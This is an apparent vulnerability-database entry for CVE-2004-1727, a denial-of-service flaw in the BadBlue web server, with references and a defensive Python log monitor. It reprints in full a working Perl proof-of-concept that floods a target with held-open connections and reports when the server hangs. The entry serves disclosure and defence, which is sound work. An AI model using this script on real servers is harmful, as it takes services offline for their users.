BadBlue Web Server Service Remote Denial-of-Service Vulnerability

Vulnerability ID: 1108143
Vulnerability type: Other
Published: 2004-08-26
Updated: 2006-08-23
CVE ID: CVE-2004-1727
CNNVD-ID: CNNVD-200408-207
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/419
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-207
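|Vulnerability details
BadBlue is a small web server program that provides directory protection. BadBlue has a flaw in how it handles multiple connections, which a remote attacker can exploit to cause a denial of service against the target service. When a remote attacker opens more than 24 simultaneous connections from the same host, the system hangs and stops accepting connections from any host.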
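For monitoring a server with this weakness, the following added example (not part of the original advisory or of BadBlue) computes the peak number of simultaneous connections per source address from a connection log and flags sources above the 24-connection figure given above. The event tuple format and the sample addresses are constructed assumptions.

```python
from collections import defaultdict

# Figure from the advisory text: more than 24 simultaneous connections
# from a single host hang the server.
MAX_CONCURRENT_PER_HOST = 24


def peak_concurrency(events):
    """events: iterable of (timestamp, src_ip, action), action 'open' or 'close'
    (assumed log format). Returns {src_ip: peak simultaneously open connections}."""
    current = defaultdict(int)
    peak = defaultdict(int)
    # Order by time; at equal timestamps handle closes first so a connection
    # slot that is released and reused is not counted twice.
    for ts, src, action in sorted(events, key=lambda e: (e[0], e[2] != "close")):
        if action == "open":
            current[src] += 1
            peak[src] = max(peak[src], current[src])
        elif action == "close" and current[src] > 0:
            current[src] -= 1
    return dict(peak)


def flag_sources(events, limit=MAX_CONCURRENT_PER_HOST):
    """Sources whose peak concurrency exceeds the limit (strictly more than 24)."""
    return sorted(s for s, p in peak_concurrency(events).items() if p > limit)


def sample_events():
    """Constructed sample log using documentation address ranges."""
    events = []
    # Browser-like client: 6 parallel connections, closed two seconds later.
    for i in range(6):
        events.append((10.0 + i * 0.1, "192.0.2.10", "open"))
        events.append((12.0 + i * 0.1, "192.0.2.10", "close"))
    # Busy but well-behaved client: 40 requests, never more than one open.
    for i in range(40):
        events.append((20.0 + i, "192.0.2.20", "open"))
        events.append((20.5 + i, "192.0.2.20", "close"))
    # One source opening 30 connections and holding them all open.
    for i in range(30):
        events.append((30.0 + i * 0.01, "198.51.100.7", "open"))
    return events


if __name__ == "__main__":
    for src in flag_sources(sample_events()):
        print(f"{src}: more than {MAX_CONCURRENT_PER_HOST} simultaneous connections")
```

Request volume alone does not trigger the flag: the client that makes 40 sequential requests peaks at one open connection, while the source holding 30 connections open is reported.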
|Vulnerability exploit (EXP)
#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################

use Strict;   # as published; the Perl pragma itself is spelled lowercase 'strict'
use Socket;
use IO::Socket;

# Arguments: host, port, number of connections, seconds to hold them open
my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];

printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("\nMaking %d Connections To %s\n", $stop, $host);

# Open the connections from this one host and leave them open
for ($i=1; $i<$stop; $i++)
{
    socket($i, PF_INET, SOCK_STREAM, $prot);
    my $dest = sockaddr_in($port, inet_aton($host));
    connect($i, $dest);
}

CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("\nExploit Attempt Unsuccessful");
exit;

# Send one ordinary request; no response means the server has stopped answering
sub CheckServer {
    ($host, $i, $slep, $stop) = @_;
    $blank = "\015\012" x 2;
    $request = "GET / HTTP/1.0".$blank;
    $remote = IO::Socket::INET->new( Proto    => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => $port,
                                     Timeout  => '10000',
                                     Type     => SOCK_STREAM,
                                   );
    print $remote $request;
    unless ( <$remote> )
    {
        printf("\nHost %s Has Been Successfully DoS'ed\n", $host);
        printf("\nThe Host Will Be Down For %d Seconds\n", $slep);
        sleep($slep);
        KillThreads($stop);
        exit;
    }
}

# Close every connection opened above so the server can recover
sub KillThreads {
    ($stop) = @_;
    printf("\nKilling All active Connections");
    for ($l=1; $l<$stop; $l++) {
        shutdown($l,2) || die("Couldn't Shut Down Socket");
    }
}

# milw0rm.com [2004-08-26]
|References

Source: XF
Name: badblue-mult-connection-dos(17064)
Link: http://xforce.iss.net/xforce/xfdb/17064
Source: BID
Name: 10983
Link: http://www.securityfocus.com/bid/10983
Source: www.gulftech.org
Link: http://www.gulftech.org/?node=research&article_id=00043-08202004
Source: SECUNIA
Name: 12346
Link: http://secunia.com/advisories/12346
Source: BUGTRAQ
Name: 20040820 BadBlue Webserver v2.5 Denial Of Service Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=109309119502208&w=2